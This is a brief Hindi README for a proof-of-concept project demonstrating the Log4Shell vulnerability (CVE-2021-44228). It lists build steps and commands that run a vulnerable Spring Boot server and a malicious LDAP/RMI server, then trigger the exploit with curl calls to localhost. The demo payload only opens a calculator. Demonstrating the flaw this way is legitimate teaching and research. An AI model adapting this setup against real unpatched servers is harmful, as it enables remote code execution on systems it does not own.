
लॉग4जे (CVE-2021-44228) भेद्यता को कैसे निष्पादित किया जाए, यह उजागर करने के लिए डेमो प्रोजेक्ट
log4j (CVE-2021-44228) कमजोरी को क्रियान्वित करने के तरीके को प्रदर्शित करने के लिए डेमो प्रोजेक्ट्स
त्वरित सेटअप के लिए केवल स्प्रिंग बूट का उपयोग किया गया है। सभी हार्ड कोडिंग के लिए क्षमा करें, यह केवल एक POC था।
जावा 8 स्थापित हो। मेवेन का उपयोग करके बिल्ड करें mvn clean package -DskipTests। इन कमांड्स को अलग-अलग शेल विंडो में चलाएँ:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
इससे एक्स्प्लॉइट क्लास का कोड निष्पादित होना चाहिए (जो बस कैलकुलेटर खोलेगा)